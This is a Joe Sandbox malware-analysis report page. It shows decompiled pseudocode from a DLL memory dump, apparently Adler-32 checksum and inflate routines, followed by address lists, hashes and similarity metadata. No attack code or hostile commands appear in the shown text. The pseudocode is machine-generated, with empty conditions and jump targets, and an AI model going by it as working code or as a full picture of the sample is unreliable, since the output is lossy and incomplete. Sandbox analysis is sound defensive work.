				if (_t823 < 0) goto 0xf3061169;
				_t913 = _t1063 - _t1041;
				if (_t823 < 0) goto 0xf306137a;
				 *(_t1043 + 0xb8) = _t1004;
				 *(_t1043 + 0x6c) = r9d;
				if (_t1063 -  *((intOrPtr*)(_t1043 + 0x1a8)) > 0) goto 0xf3061389;
				_t477 =  *(_t1079 + 0x20);
				_t1087 =  *((intOrPtr*)(_t1043 + 0x1a0)) + _t1041;
				_t655 = _t477 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t941 = _t913 & 0xfffffffc;
				 *(_t1043 + 0xf8) = _t913;
				 *(_t1043 + 0x108) = _t913;
				_t882 = _t941 - 0x3f51f0dfc0;
				 *(_t1043 + 0x50) = _t882;
				r12d = 0x56c0;
				 *(_t1043 + 0xe8) = _t1087;
				 *(_t1043 + 0xd8) = _t1012;
				 *(_t1043 + 0x7c) = _t655;
				 *(_t1043 + 0x100) = _t941;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t655 * 0x56c0;
				_t1098 = _t1087;
				 *(_t1043 + 0x80) =  *_t1098 & 0x000000ff;
				 *(_t1043 + 0x84) = _t1098[1] & 0x000000ff;
				 *(_t1043 + 0x88) = _t1098[2] & 0x000000ff;
				 *(_t1043 + 0x8c) = _t1098[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1043 + 0xc0 + _t1079 * 4)) =  *((intOrPtr*)(_t1043 + 0xc0 + _t1079 * 4)) +  *((intOrPtr*)(_t1043 + 0x80 + _t1079 * 4));
				_t284 = _t1079 + 1; // 0x1
				if (_t284 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1043 + 0xa0 + _t1012 * 4)) =  *((intOrPtr*)(_t1043 + 0xa0 + _t1012 * 4)) +  *((intOrPtr*)(_t1043 + 0x80 + _t1012 * 4));
				_t294 = _t1012 + 1; // 0x1
				_t827 = _t294 - 4;
				if (_t827 != 0) goto 0xf3060e4c;
				_t883 = _t882 + 0xfffffffc;
				if (_t827 != 0) goto 0xf3060dea;
				_t519 =  *(_t1043 + 0xc0 + _t883 * 4);
				 *(_t1043 + 0xc0 + _t883 * 4) = _t519;
				_t301 = _t883 + 1; // 0x1
				_t914 = _t301;
				_t884 = _t914;
				if (_t914 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1043 + 0xa0 + _t884 * 4)) =  *((intOrPtr*)(_t1043 + 0xa0 + _t884 * 4)) - _t519 * 0xfff1;
				_t308 = _t884 + 1; // 0x1
				if (_t308 != 4) goto 0xf3060ea7;
				_t888 = _t1041 * _t941 >> 0x2f;
				_t830 = 0x3f51f08900 - __r12;
				if (_t830 >= 0) goto 0xf3060de2;
				_t1121 =  *(_t1043 + 0x108);
				r14d = r14d & 0x00000003;
				_t1066 =  *((intOrPtr*)(_t1043 + 0x58));
				r10d =  *(_t1043 + 0x1b8);
				_t1017 =  *(_t1043 + 0xe8);
				r12d =  *(_t1043 + 0x7c);
				if (_t830 == 0) goto 0xf3060fc8;
				_t1071 = 0x3f51f0dfc0 + _t1017;
				 *(_t1043 + 0x80) =  *_t1071 & 0x000000ff;
				 *(_t1043 + 0x84) = _t1071[1] & 0x000000ff;
				 *(_t1043 + 0x88) = _t1071[2] & 0x000000ff;
				 *(_t1043 + 0x8c) = _t1071[3] & 0x000000ff;
				 *((intOrPtr*)(_t1043 + 0xc0 + _t888 * 4)) =  *((intOrPtr*)(_t1043 + 0xc0 + _t888 * 4)) +  *((intOrPtr*)(_t1043 + 0x80 + _t888 * 4));
				_t332 = _t888 + 1; // 0x1
				_t982 = _t332;
				_t889 = _t982;
				if (_t982 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t629 =  *(_t1043 + 0x80 + _t889 * 4);
				 *((intOrPtr*)(_t1043 + 0xa0 + _t889 * 4)) =  *((intOrPtr*)(_t1043 + 0xa0 + _t889 * 4)) + _t629;
				_t342 = _t889 + 1; // 0x1
				_t983 = _t342;
				_t890 = _t983;
				_t832 = _t983 - 4;
				if (_t832 != 0) goto 0xf3060f9f;
				if (_t832 != 0) goto 0xf3060f41;
				_t630 = _t629 * 0xfff1;
				 *((intOrPtr*)(_t1043 + 0xc0 + _t890 * 4)) =  *((intOrPtr*)(_t1043 + 0xc0 + _t890 * 4)) - _t630;
				_t350 = _t890 + 1; // 0x1
				_t987 = _t350;
				_t891 = _t987;
				if (_t987 != 4) goto 0xf3060fd7;
				r9d =  *(_t1043 + 0x6c);
				 *((intOrPtr*)(_t1043 + 0xa0 + _t891 * 4)) =  *((intOrPtr*)(_t1043 + 0xa0 + _t891 * 4)) - _t630 * 0xfff1;
				_t359 = _t891 + 1; // 0x1
				_t991 = _t359;
				_t892 = _t991;
				if (_t991 != 4) goto 0xf3061019;
				 *(_t1043 + 0xa0 + _t892 * 4) =  *(_t1043 + 0xa0 + _t892 * 4) << 2;
				_t893 = _t892 + 1;
				if (_t893 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1043 + 0xa4)) =  *((intOrPtr*)(_t1043 + 0xa4)) -  *((intOrPtr*)(_t1043 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1043 + 0xa8)) =  ~( *((intOrPtr*)(_t1043 + 0xc8)) +  *((intOrPtr*)(_t1043 + 0xc8))) +  *((intOrPtr*)(_t1043 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1043 + 0xac)) =  *((intOrPtr*)(_t1043 + 0xac)) + _t991 + _t991 * 2;
				_t894 = _t893 + 1;
				if (_t894 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1043 + 0x50);
				_t896 = _t894 * _t1041 >> 0x2f;
				_t897 = _t896 + 1;
				if (_t897 != 4) goto 0xf30610e4;
				if (_t1121 == 0) goto 0xf306110b;
				_t610 = r12d +  *((intOrPtr*)(_t1043 + 0xc0 + _t893 * 4)) + ( *(_t1017 +  *(_t1043 + 0x100) + _t897) & 0x000000ff);
				_t712 = (_t477 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1043 + 0xa0 + _t896 * 4)) + _t610;
				if (_t1121 != _t897 + 1) goto 0xf30610fb;
				_t506 = _t712 * 0xfff1;
				_t715 = _t712 - _t506 << 0x00000010 | _t610 - _t610 * 0x0000fff1;
				 *(_t1066 + 0x20) = _t715;
				_t840 = r9b;
				if (_t840 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t840 == 0) goto 0xf306117f;
				r9b = _t715 ==  *((intOrPtr*)(_t1066 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t904 =  *((intOrPtr*)(_t1043 + 0x110));
				 *(_t904 + 8) = r9b;
				 *_t904 =  *((intOrPtr*)(_t1043 + 0xe0)) -  *(_t1043 + 0xb8) + __r15 +  *(_t1043 + 0xd8);
				 *((long long*)(_t904 + 0x10)) = _t1066 - _t1041;
				return _t506;
			}

0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f8112bbea3761b6cf010d9aa5640427536a6326238a05e8526c75dc599e2d4
Instruction ID: 32cc216d71e413cf877f110fafbc937fce76b9c56a041b22bc18a711ee100628
Opcode Fuzzy Hash: 90f8112bbea3761b6cf010d9aa5640427536a6326238a05e8526c75dc599e2d4
Instruction Fuzzy Hash: 00E1D572B0C3C58BE7A48F19E4403AAB7E6F788754F148236DA9957BD8D63DD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30601AF Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E000007FE7FEF30601AF(void* __ebx, void* __r8, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed char _t360;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				unsigned int _t379;
				signed int _t380;
				short _t382;
				signed int _t396;
				signed short _t398;
				signed int _t399;
				signed int _t401;
				signed int _t409;
				signed short _t411;
				signed char _t420;
				signed int _t426;
				signed int _t429;
				unsigned int _t433;
				signed int _t462;
				signed char _t464;
				signed int _t473;
				signed char _t480;
				signed int _t484;
				signed int _t485;
				signed char _t487;
				signed char _t493;
				signed int _t497;
				signed char _t501;
				signed int _t504;
				signed char _t523;
				unsigned int _t530;
				signed char _t532;
				signed int _t542;
				signed int _t547;
				signed int _t560;
				signed int _t561;
				signed int _t569;
				signed int _t570;
				signed short _t573;
				void* _t577;
				signed int _t580;
				signed int _t585;
				signed int _t588;
				signed int _t591;
				signed char _t593;
				signed int _t601;
				signed int _t603;
				signed int _t627;
				signed int _t630;
				void* _t631;
				signed int _t641;
				void* _t643;
				void* _t672;
				short _t680;
				void* _t685;
				signed int _t713;
				signed int _t714;
				void* _t718;
				void* _t721;
				void* _t723;
				signed int _t731;
				signed long long _t734;
				signed long long _t738;
				signed long long _t739;
				signed long long _t745;
				signed long long _t746;
				long long _t762;
				signed int _t771;
				signed long long _t772;
				signed long long _t773;
				signed long long _t777;
				signed long long _t778;
				signed long long _t779;
				signed long long _t780;
				signed long long _t781;
				signed long long _t782;
				signed long long _t783;
				signed long long _t785;
				void* _t786;
				long long* _t793;
				void* _t795;
				long long _t796;
				signed long long _t798;
				signed long long _t802;
				signed long long _t803;
				intOrPtr _t816;
				void* _t818;
				long long _t821;
				signed long long _t822;
				intOrPtr _t823;
				signed long long _t825;
				signed long long _t832;
				unsigned long long _t835;
				unsigned long long _t836;
				intOrPtr _t845;
				signed long long _t850;
				unsigned long long _t852;
				signed long long _t859;
				signed long long _t860;
				signed long long _t864;
				signed long long _t868;
				intOrPtr _t869;
				void* _t871;
				signed long long _t880;
				long long _t884;
				void* _t885;
				signed long long _t888;
				signed char* _t893;
				signed long long _t897;
				void* _t902;
				signed long long _t913;
				void* _t915;
				long long _t918;
				void* _t922;
				intOrPtr _t925;
				void* _t927;
				intOrPtr _t934;
				intOrPtr _t937;
				long long _t939;
				signed char* _t942;
				intOrPtr _t944;
				intOrPtr _t945;
				intOrPtr _t946;
				intOrPtr _t948;
				signed long long _t949;
				long long _t954;
				signed char* _t957;
				long long _t965;
				signed char* _t968;
				void* _t974;
				void* _t975;
				void* _t979;
				void* _t980;
				signed int* _t981;
				signed long long _t987;

				_t734 =  *((intOrPtr*)(_t915 + 0x1a8));
				_t631 = __r8 - _t734;
				if (_t631 == 0) goto 0xf3061238;
				if (_t631 >= 0) goto 0xf3061284;
				 *((char*)(__r11 + __r8)) =  *(_t915 + 0x3c);
				_t918 = __r8 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t915 + 0x40) =  *(_t915 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t915 + 0x70)) = __r13;
				r13d =  *(_t915 + 0x3c);
				_t897 =  *((intOrPtr*)(_t915 + 0x1a8));
				if (_t918 == _t897) goto 0xf3060b97;
				_t795 = _t897 - _t918;
				_t884 = _t918;
				_t796 =  >=  ? _t734 : _t795;
				 *((long long*)(_t915 + 0x28)) =  *(_t915 + 0xb8);
				 *((long long*)(_t915 + 0x20)) = _t796;
				_t939 = _t884;
				E000007FE7FEF30616A0();
				_t944 =  *((intOrPtr*)(_t915 + 0x58));
				_t922 = _t884 + _t796;
				r12b = 0xc;
				 *(_t915 + 0x40) =  *(_t915 + 0x40) - __ebx;
				if (_t795 != _t734) goto 0xf3060208;
				_t965 =  *((intOrPtr*)(_t915 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t944 + 0x18)) == 0) goto 0xf305f43b;
				_t480 =  *(_t915 + 0x38);
				_t869 =  *((intOrPtr*)(_t915 + 0xe0));
				_t601 =  >=  ? r14d : _t480 >> 3;
				_t464 = _t897 * 8;
				_t360 = (_t480 & 0xfffffff8) - _t464;
				 *(_t915 + 0x38) = _t360;
				_t974 = __r14 - __r15 + _t869 - _t897;
				if (_t974 - _t869 > 0) goto 0xf30613c7;
				_t975 = _t974 + _t965;
				 *(_t915 + 0x30) =  !(0xffffffff << (_t360 & 0x00000038)) &  *(_t915 + 0x30) >> (_t480 & 0x00000007);
				r12b = 0x18;
				if (( *(_t915 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t915 + 0x40) = 0;
				r12b = 0x17;
				_t484 =  *(_t915 + 0x40) & 0x000001ff;
				 *(_t915 + 0x40) = _t484;
				r12b = 0x14;
				if (_t484 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t484 - 0x11d > 0) goto 0xf305f43b;
				_t485 =  *(_t734 + 0xf311eee8) & 0x000000ff;
				_t641 = _t485;
				r12b = _t641 == 0;
				 *(_t915 + 0x44) = _t485;
				 *(_t915 + 0x40) =  *(0xf311ef08 + _t734 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t915 + 0x3c);
				if (_t641 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t915 + 0xf4)) != 0) goto 0xf305f43b;
				_t885 = _t922 + 0xf311ef08;
				_t832 =  *((intOrPtr*)(_t915 + 0x1a8));
				_t643 = _t885 - _t832;
				if (_t643 > 0) goto 0xf30603b1;
				_t738 = (_t922 - _t939 &  *(_t915 + 0xb8)) - _t922;
				if (_t643 < 0) goto 0xf3060a9a;
				if (_t738 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t368 =  *(_t915 + 0x40);
				_t569 =  *(_t915 + 0x50);
				if (_t368 - 3 > 0) goto 0xf3060605;
				_t487 =  *(_t915 + 0x38);
				if (_t487 == 0) goto 0xf3060421;
				_t902 = _t975;
				if (_t487 - 8 >= 0) goto 0xf3060436;
				if (_t902 == __r15) goto 0xf3060413;
				_t798 =  *(_t915 + 0x30) | _t832 << _t487;
				 *(_t915 + 0x30) = _t798;
				 *(_t915 + 0x38) = _t487 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t569;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t902 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t835 = _t798 >> 8;
				 *(_t915 + 0x30) = _t835;
				 *(_t915 + 0x38) = ( *(_t944 + 0x14) << 8) + 0xfffffff8;
				_t547 =  *(_t944 + 0x14) << 8;
				_t493 = _t464 & 0x000000ff | _t547;
				 *(_t944 + 0x14) = _t493;
				 *(_t915 + 0x40) = _t368 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t569;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t371 = _t493 & 0x000000ff;
				if (_t371 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t603 =  !_t601 & _t547;
				_t836 = _t835 >> _t371;
				 *(_t915 + 0x30) = _t836;
				 *(_t915 + 0x38) = _t464;
				 *(_t915 + 0x40) =  *(_t915 + 0x40) + _t603;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t915 + 0x30) = _t836 >> _t371;
				 *(_t915 + 0x38) = _t464;
				 *(_t915 + 0x3c) =  *(_t915 + 0x3c) + ( !_t603 & _t547);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t915 + 0x30) = _t798 >> _t371;
				 *(_t915 + 0x38) = _t569;
				 *(_t915 + 0x80) = _t738;
				 *(_t915 + 0x88) = _t738;
				 *((long long*)(_t915 + 0x90)) = 0xb;
				_t497 =  *(_t915 + 0x3c);
				_t739 = _t738 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t497 != 0x10) goto 0xf30606d9;
				if (_t885 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t915 + 0x30) = _t739 >> 8;
				 *(_t915 + 0x38) = _t497 + 0xfffffff8;
				 *(_t915 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t374 =  *(_t944 + 0x291d) & 0x0000ffff;
				 *(_t915 + 0x40) = _t374;
				r12b = 0x1e;
				if (_t374 !=  !( *(_t944 + 0x291f) & 0x0000ffff)) goto 0xf305f43b;
				r12b = 0x14;
				if (_t374 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t816 =  *((intOrPtr*)(_t915 + 0x128));
				E000007FE7FEF30F24C0();
				_t945 =  *((intOrPtr*)(_t915 + 0x58));
				 *(_t915 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t739 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t915 + 0x6c);
				if (_t816 - 1 > 0) goto 0xf3060acc;
				_t501 =  *(_t915 + 0x38);
				_t379 =  *((short*)(_t945 + 0x3c + _t739 * 2));
				if (_t379 < 0) goto 0xf3060659;
				if ((_t379 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t380 = _t379 >> 9;
				if (_t501 - _t380 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t501 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t380 - 0x23f > 0) goto 0xf3061218;
				_t382 =  *((short*)(_t945 + 0x83c + _t739 * 2));
				if (_t382 >= 0) goto 0xf3060690;
				if (_t501 - 0xc >= 0) goto 0xf3060663;
				if (_t382 >= 0) goto 0xf3060aec;
